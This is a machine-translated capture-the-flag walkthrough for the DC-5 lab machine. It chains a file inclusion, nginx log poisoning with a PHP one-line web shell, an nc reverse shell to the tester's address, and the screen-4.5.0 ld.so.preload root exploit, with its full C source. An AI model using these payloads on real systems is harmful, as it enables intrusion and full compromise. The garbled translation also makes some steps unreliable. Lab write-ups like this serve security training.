DC-5 target

ifconfig

Find the host IP

Sweep a wave Intranet , Detect the surviving host

nmap 192.168.61.0/24

Use nmap Tool pair DC-5 The target machine scans the open port

nmap -A -T4 192.168.61.133 -p- -oN nmap133.A

( halfway IP Changed to 192.168.61.134)

It's open 80,111,39542

Open the displayed IP Address

  stay concat Fill in the information in the interface , Will jump to the page , yes GET The ginseng

  Refresh repeatedly and you will find that the time changes , Guess the page has a file containing （?）

And then use burp Blast page （ The imperial sword cannot be swept out ）

altogether 7 individual

 footer You can see this , Confirm that this is the containing interface

Use BurpSuite The variable name contained in the blasting file , And backstage passwd File exists in

Variable name :file,passwd file location ：/etc/passwd

Check the log storage location ：

Law 1 ：

Use BurpSuite Location of the log file of the bag grabbing blasting target , The blast was successful

/var/log/nginx/error.log
/var/log/nginx/access.log 

Law two ：

file==/etc/nginx/nginx.conf

<?php system($_GET['test']);?>

Use BurpSuite Modify packet data , Write a word Trojan , Open the log file to see the successful writing

Use a one sentence Trojan horse to execute commands

/var/log/nginx/error.log&test=ls

  stay kali monitor

netcat -l -p 4444

file=/var/log/nginx/error.log&test=nc+192.168.61.129+4444+-e+/bin/bash

then

python -c 'import pty;pty.spawn("/bin/sh")'

  Search permissions

(130 Bar message ) find / -perm -4000 2＞/dev/null Split explanation of _Marx_Otto The blog of -CSDN Blog  

find / -perm /4000 2>/dev/null

Simply speaking ： seek 4000 Permission file , Not displaying other error messages is equivalent to filtering . 

screen-4.5.0： Command line terminal switching software , It connects several local or remote command-line conversations at the same time , It can be used as a power raising point

View vulnerabilities

Extract the file

cp /usr/share/exploitdb/exploits/linux/local/41154.sh screen_450.sh

cp /usr/share/exploitdb/exploits/linux/local/41152.sh screen_450.txt

Open file

cat screen_450.txt
cat screen_450.sh

Save the code to /tmp Next

Save as

rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

libhax.c 

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

And then put rootshell.c Translate it into rootshell

gcc -o /tmp/rootshell /tmp/rootshell.c

hold libhax.c Translate it into libhax.so 

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

First, libhax.so

In the virtual machine

nc -lvvp 4444 < libhax.so

On the target plane

nc 192.168.61.129 4444 > libhax.so

  Then on the host ctrl+c End

And then there was rootshell

In the virtual machine

nc -lvvp 4444 < rootshell

On the target plane

nc 192.168.61.129 4444 > rootshell

Check on the target , You can see the success of the incoming  

  Then carry out a series of right raising steps

（ There are steps in the previous vulnerability information ）

cd /etc

umask 000

screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"

screen -ls

/tmp/rootshell

Then you get root Yes （whoami see ）

cd /root

ls

cat thisistheflag.txt